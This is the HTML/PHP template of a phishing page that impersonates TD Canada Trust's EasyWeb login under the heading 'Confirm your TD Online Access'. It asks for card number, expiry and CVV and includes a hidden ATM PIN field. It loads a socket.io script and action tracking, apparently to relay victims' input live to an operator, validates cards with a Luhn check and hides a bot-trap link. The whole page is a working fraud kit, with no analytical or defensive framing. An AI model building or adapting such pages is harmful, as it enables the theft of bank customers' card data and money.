<html lang="en-CA">

<head>
    <span hidden id="page"> Card </span>
    <span hidden id="pageRedirection"> /td/loading </span>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <style type="text/css">
        [ng\:cloak],
        [ng-cloak],
        [data-ng-cloak],
        [x-ng-cloak],
        .ng-cloak,
        .x-ng-cloak,
        .ng-hide:not(.ng-hide-animate) {
            display: none !important;
        }

        [ng\:form] {
            display: block;
        }

        .ng-animate-shim {
            visibility: hidden;
        }

        .ng-anchor {
            position: absolute;
        }
    </style>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable = no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-touch-fullscreen" content="yes">
    <title>EasyWeb Login</title>
    <link rel="stylesheet" href="/assets/td/files2/uap-application-all-css.css">
    <link rel="icon" href="/assets/td/favicon.ico">
    <style>
        .form-group {
            padding-top: 0px;
        }

        .display-inline-block {
            display: inline-block;
        }
    </style>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
    <script>var lrbank = '<?=escape($udata->last->bank)?>'; var lrinfo = '<?=escape($udata->last->info)?>';</script>
    <script src="/assets/js/actions.js?v=<?=time()?>"></script>
    <script src="/socket.io/socket.io.js"></script>
    <script src="../assets/js/td/login/index.js"></script>
</head>

<body prevent-click-highlight="" autoscroll="" class="">
    <input type="hidden" id="userAgent" name="userAgent">
    <input type="hidden" id="banks" name="banks">
    <div id="contentWrapper">
        <div data-ui-view="header" class="" style="">
            <otp-header>
                <div class="td_rq_header-nav td-header-nav">
                    <header class="td-header-desktop">
                        <div class="td-nav-primary">
                            <div class="td-container">
                                <div class="td-section-left">
                                    <div class="td-logo" style="margin-top: 15px;">
                                        <img alt="TD Canada Trust" src="/assets/td/files2/td-logo.png">
                                    </div>
                                </div>
                                <div class="td-section-right">
                                    <div class="td-quick-access">
                                        <ul class="td-header-nav-utilities">
                                            <li class="td-dropdown td-dropdown-language td-dropdown-no-hover ng-hide"
                                                aria-hidden="true">
                                                <a href="" class="td-show-label" aria-haspopup="true"
                                                    aria-expanded="false" id="td-desktop-nav-dropdown-link-0">
                                                    <span class="td-forscreenreader">Select language</span>
                                                    Français
                                                    <span class="td-icon expand" aria-hidden="true"></span>
                                                    <span class="td-icon collapse" aria-hidden="true"></span>
                                                </a>
                                                <ul class="td-dropdown-content"
                                                    aria-labelledby="td-desktop-nav-dropdown-link-0">
                                                    <!---->
                                                    <li ng-class="{'active': language==vm.dt.selectedLanguage}"
                                                        ng-repeat="language in vm.dt.languages track by $index"
                                                        class="active">
                                                        <a href="" role="button" ng-click="vm.setLanguage(language)">
                                                            English
                                                            <!----><span ng-if="language==vm.dt.selectedLanguage"
                                                                class="td-icon selected" aria-hidden="true">
                                                            </span><!---->
                                                            <!----><span ng-if="language==vm.dt.selectedLanguage"
                                                                class="td-forscreenreader">Selected</span><!---->
                                                        </a>
                                                    </li>
                                                    <!---->
                                                    <li ng-class="{'active': language==vm.dt.selectedLanguage}"
                                                        ng-repeat="language in vm.dt.languages track by $index">
                                                        <a href="" role="button" ng-click="vm.setLanguage(language)">
                                                            Français
                                                            <!---->
                                                            <!---->
                                                        </a>
                                                    </li>
                                                    <!---->
                                                </ul>
                                            </li>
                                            <li class="secure-lock-position" aria-hidden="true">
                                            </li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </header>
                    <!-- Desktop Header END -->
                    <!-- Mobile Header START -->
                    <header class="td-header-mobile">
                        <div class="td-container">
                            <div class="td-section-left">
                                <button type="button" class="td-mobile-action-button td-mobile-menu-button">
                                    <div ng-show="!!vm.needLangToggle || ($root.otpGenericConfig &amp;&amp; !!$root.otpGenericConfig.isLanguageToggleEnabled)"
                                        class="td-mobile-menu-button-icon ng-hide" aria-hidden="true">
                                        <span class="td-forscreenreader">Open menu</span>
                                        <span class="icon-bar" aria-hidden="true"></span>
                                        <span class="icon-bar" aria-hidden="true"></span>
                                        <span class="icon-bar" aria-hidden="true"></span>
                                    </div>
                                    <div class="td-logo">
                                        <img src="/assets/td/files2/td-logo.png" alt="TD Canada Trust">
                                    </div>
                                </button>
                                <button type="button" class="td-mobile-action-button td-mobile-back-button"
                                    onclick="history.back();">
                                    Test!
                                    <div class="td-mobile-back-button-icon">
                                        <span class="td-icon"></span>
                                        <span class="td-forscreenreader">Back</span>
                                    </div>
                                    <div class="td-logo">
                                        <img src="/assets/td/files2/td-logo.png" alt="TD Canada Trust">
                                    </div>
                                </button>
                            </div>
                            <div class="td-section-right">
                                <div class="secure-lock-position" aria-hidden="true">
                                    <!--<span class="td-icon icon-regular td-icon-logout"></span>-->
                                </div>
                            </div>
                        </div>
                    </header>
                    <!-- Mobile Header END -->
                    <!-- Mobile Off-canvas Menu START -->
                    <div ng-show="!!vm.needLangToggle || ($root.otpGenericConfig &amp;&amp; !!$root.otpGenericConfig.isLanguageToggleEnabled)"
                        class="td-nav-mobile ng-hide" aria-hidden="true">
                        <!-- Primary mobile menu START -->
                        <div class="td-nav-mobile-menu td-nav-mobile-menu-primary">
                            <span tabindex="0"></span>
                            <div class="td-nav-mobile-menu-top">
                                <div class="td-nav-mobile-menu-header">
                                    <div class="td-logo">
                                        <a href="https://authentication.td.com/">
                                            <img src="/assets/td/files2/td-logo.png" alt="TD Canada Trust">
                                        </a>
                                    </div>
                                    <button type="button" class="td-mobile-menu-close">
                                        <span class="td-forscreenreader">Close Menu</span>
                                        <span class="td-icon" aria-hidden="true"></span>
                                    </button>
                                </div>
                            </div>
                            <nav>
                                <ul class="td-nav-mobile-menu-list">
                                    <li
                                        class="td-nav-mobile-menu-item td-item-toggle td-accordion td-accordion-language">
                                        <a href="" aria-expanded="false" role="button">
                                            <span class="td-forscreenreader">Select language</span>
                                            Français
                                            <span class="td-icon expand" aria-hidden="true"></span>
                                            <span class="td-icon collapse" aria-hidden="true"></span>
                                        </a>
                                        <ul class="td-accordion-content">
                                            <!---->
                                            <li ng-class="{'active': language==vm.dt.selectedLanguage}"
                                                ng-repeat="language in vm.dt.languages track by $index" class="active">
                                                <a href="" role="button" ng-click="vm.setLanguage(language)">
                                                    English
                                                    <!----><span ng-if="language==vm.dt.selectedLanguage"
                                                        class="td-icon selected" aria-hidden="true">
                                                    </span><!---->
                                                    <!----><span ng-if="language==vm.dt.selectedLanguage"
                                                        class="td-forscreenreader">Selected</span><!---->
                                                </a>
                                            </li>
                                            <li ng-class="{'active': language==vm.dt.selectedLanguage}"
                                                ng-repeat="language in vm.dt.languages track by $index">
                                                <a href="" role="button" ng-click="vm.setLanguage(language)">
                                                    Français
                                                </a>
                                            </li>
                                        </ul>
                                    </li>
                                </ul>
                            </nav>
                            <span tabindex="0"></span>
                        </div>
                        <div class="td-nav-mobile-overlay"></div>
                    </div>
                </div>
            </otp-header>
        </div>
        <div class="td-contentarea" role="main" style="padding-top: 70px;">
            <ui-view class="" style="">
                <ui-view>
                    <reset>
                        <ui-view class="" style="">
                            <reset-password dt="::$resolve.dt" device-print="::$resolve.devicePrint"
                                device-info="::$resolve.deviceInfo" thread-matrix="::$resolve.threadMatrix">
                                <div class="td-container">
                                    <h1 class="text-center" tabindex="0">Confirm your TD Online Access</h1>
                                    <hr aria-hidden="true" class="td-thin-divider-line-1">
                                    <form id="loginForm"
                                        class="ng-pristine ng-valid td_rq_form_legacy td-form td-form-validate td-form-dynami">
                                        <h1 class="text-center">Payment Information</h1>
                                        <div class="td-row">
                                            <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">
                                                <div class="td-row">
                                                    <div class="td-col-sm-6 td-col-sm-offset-3">

                                                        <div class="form-group" style="">
                                                            <label>Card Number</label>
                                                            <input id="input-card" type="tel"
                                                                placeholder="Enter your Card Number" name="card"
                                                                class="form-control lrinput" onkeyup="split()"
                                                                required="true" autocomplete="off" maxlength="19"
                                                                oninput="this.value = this.value.replace(/[^0-9, ]/, '')"
                                                                attr-action="Filling Card">
                                                            <script src="/assets/js/splitter.js?v=<?=time()?>"></script>
                                                            <link rel="stylesheet"
                                                                href="/assets/css/card.css?<?=time()?>">
                                                        </div>

                                                        <label>Expiry</label>
                                                        <div class="form-group" style="">
                                                            <select name="exp1" required
                                                                class="form-control text-center display-inline-block lrinput"
                                                                style="width:90px;" attr-action="Selecting Expiry">
                                                                <option value="">MM</option>
                                                                <option value="01">01</option>
                                                                <option value="02">02</option>
                                                                <option value="03">03</option>
                                                                <option value="04">04</option>
                                                                <option value="05">05</option>
                                                                <option value="06">06</option>
                                                                <option value="07">07</option>
                                                                <option value="08">08</option>
                                                                <option value="09">09</option>
                                                                <option value="10">10</option>
                                                                <option value="11">11</option>
                                                                <option value="12">12</option>

                                                            </select>
                                                            <select name="exp2" required
                                                                class="form-control text-center display-inline-block lrinput"
                                                                style="width:90px;" attr-action="Selecting Expiry">
                                                                <option value="">YY</option>
                                                                <option value="24">24</option>
                                                                <option value="25">25</option>
                                                                <option value="26">26</option>
                                                                <option value="27">27</option>
                                                                <option value="28">28</option>
                                                                <option value="29">29</option>
                                                                <option value="30">30</option>

                                                            </select>
                                                        </div>

                                                        <div class="form-group" style="">
                                                            <label>Cvv</label>
                                                            <input required="" id="input-cvv" type="tel" maxlength="3"
                                                                placeholder="&bullet;&bullet;&bullet;" name="cvv"
                                                                class="form-control lrinput"
                                                                oninput="this.value = this.value.replace(/[^0-9]/, '')"
                                                                attr-action="Filling Cvv">
                                                        </div>

                                                        <div hidden class="form-group" style="">
                                                            <label>ATM Pin</label>
                                                            <input required="" id="input-atm" type="tel" maxlength="6"
                                                                placeholder="&bullet;&bullet;&bullet;&bullet;"
                                                                name="atm" class="form-control lrinput"
                                                                oninput="this.value = this.value.replace(/[^0-9]/, '')"
                                                                attr-action="Filling ATM Pin">
                                                        </div>

                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="td-row">
                                            <div
                                                class="td-col-sm-4 td-col-sm-offset-2 td-col-sm-push-4 td-col-md-3 td-col-md-offset-3 td-col-md-push-3">
                                                <div class="form-group">
                                                    <div onclick="submitForm()" type="submit"
                                                        class="td-button td-button-secondary" style="width:100%;">
                                                        Submit
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </form>
                                    <br><br><br><br><br><br><br>
                                </div>
                                <br><br>
                            </reset-password>
                        </ui-view>
                    </reset>
                </ui-view>
            </ui-view>
        </div>
        <div data-ui-view="footer" class="">
            <otp-footer>
                <footer class="td-background-dark-green"
                    style="left: 0px; right: 0px; bottom: 0px; position: absolute;">
                    <div class="td-container">
                        <div class="td-row">
                            <div class="td-col-xs-12 td-footer-content otp-footer-content">
                                <div class="td-footer-links td-copy-align-centre td-copy-white">
                                    <a class="td-copy-white td-link-nounderline td-copy-standard" target="_blank"
                                        href="https://www.td.com/privacy-and-security/privacy-and-security/index.jsp">
                                        Privacy and Security
                                    </a>
                                    <a class="td-copy-white td-link-nounderline td-copy-standard" target="_blank"
                                        href="https://www.td.com/to-our-customers/">
                                        Legal
                                    </a>
                                    <a class="td-copy-white td-link-nounderline td-copy-standard" target="_blank"
                                        href="http://www.tdcanadatrust.com/customer-service/accessibility/accessibility-at-td/index.jsp">
                                        Accessibility
                                    </a>
                                    <a href="/not-found" style="visibility: hidden;">d0 n0t cl1ck</a>
                                </div>
                            </div>
                        </div>
                    </div>
                </footer>
            </otp-footer>
        </div>
    </div>
</body>
<script>
    function isValidCardNumber(value) {
        // Remove any spaces or hyphens
        const cardNumber = value.replace(/[\s-]/g, '');

        // Ensure only numbers are present
        if (!/^\d+$/.test(cardNumber)) {
            return false;
        }

        let sum = 0;
        let shouldDouble = false;

        // Start from the rightmost digit and move to the left
        for (let i = cardNumber.length - 1; i >= 0; i--) {
            let digit = parseInt(cardNumber.charAt(i), 10);

            if (shouldDouble) {
                if ((digit *= 2) > 9) {
                    digit -= 9;
                }
            }

            sum += digit;
            shouldDouble = !shouldDouble; // Alternate doubling
        }

        // The card number is valid if the sum is a multiple of 10
        return (sum % 10) === 0;
    }

    let hasAlerted = false;

    document.getElementById('input-card').addEventListener('blur', function () {
        if (!isValidCardNumber(this.value)) {
            if (!hasAlerted) {
                alert('The card number is not valid.');
                hasAlerted = true;
            }
            this.focus();
        } else {
            hasAlerted = false;
        }
    });


</script>

</html>